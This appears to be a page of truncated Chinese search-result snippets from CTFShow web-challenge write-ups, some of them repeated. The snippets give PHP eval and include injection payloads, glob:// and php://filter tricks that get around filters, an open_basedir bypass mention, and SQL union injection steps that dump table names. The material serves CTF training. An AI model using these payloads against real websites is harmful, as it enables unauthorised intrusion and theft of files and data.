web74:eval() 利用,正则绕过。 web75:eval() 利用,正则绕过,PDO 利用。 web76:eval() 利用,正则绕过,PDO 利用。 web77:eval() 利用,正则绕过,伪协议glob://,FFI 利用。 web78:include() 利用,伪协议php://。 web79:include() 利用,伪协议data://。 web80:include() 利用,一句话木马之 Nginx 日志...
WEB15:首页找到qq邮箱。根据提示访问/admin/(也可以用dirsearch扫,线程不能开太多),发现是一个后台登录界面。登录admin,提示密码错误,进入忘记密码,发现问题是所在地。根据拿到的qq邮箱在qq里搜索qq号,可以看到号主所在地。填入后提示重置密码,用密码登录admin拿到flag。
CTFShow-Web入门-命令执行 71-74 web71 payload:c=include("/flag.txt");exit(); 执行完前面的包含语句后会强制退出,不会执行后面的语句 web72 error_reporting(0);ini_set('display_errors', 0);//你们在炫技吗?if(isset($_POST['c'])){$c=$_POST['c'];eval($c);$s=ob_get_contents();ob...
web73 命令执行—原生类遍历目录 web75-通过pdo类开启数据库链接来突破函数限制读取文件 web76—通过php7.4的新特性—FFI调用C语言写的库来读取文件 <2025年1月> 日一二三四五六 2930311234 567891011 12131415161718 19202122232425 2627282930311 2345678 常用链接 ...
web75~不太行 glob://协议读文件名flag36.txt, c=$it = new DirectoryIterator("glob:///*");foreach($it as $f) {echo$f->getFilename()."\n";}die(); 接下来就是懵逼时刻了。 p牛的bypass open_basedir脚本: <?php header('content-type: text/plain'); error_reporting(-1); ini_set(...
web73 strlen()绕过 没给源码,先利用上一题的payload将flag文件名跑出来为:flagc.txt 使用poc后提示strlen()函数被禁用strlen()函数返回字符串的长度,所以自定义一个返回字符串长度的函数来代替strlen即可 function strlen_admin($s){ $cnt = 0; while(isset($s[$cnt])) { $cnt ++; } return $cnt; }...
web75~不太行 glob://协议读文件名flag36.txt, c=$it = new DirectoryIterator("glob:///*");foreach($it as $f) {echo$f->getFilename()."\n";}die(); 接下来就是懵逼时刻了。 p牛的bypass open_basedir脚本: <?php header('content-type: text/plain'); error_reporting(-1); ini_set(...
web171 首先尝试1'--+,发现有返回值;说明直接闭合正确; 接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来) 查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web 爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_sche...
web 32过滤了: flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\( 这里考虑:利用文件包含以及伪协议读取?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php这里伪协议的意思是,php://filter(过滤器)/convert.base64-encode(base64编码的过滤器)/resource=flag....
CTFSHOW(WEB) web入门 给她1 参考文档 https://blog.csdn.net/weixin_51412071/article/details/124270277 查看链接 sql注入 复制代码 1 2 3 4 5 <?php$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));$sql=sprintf("select * from user where name='%s'$pass",addslashes($_GET['name'...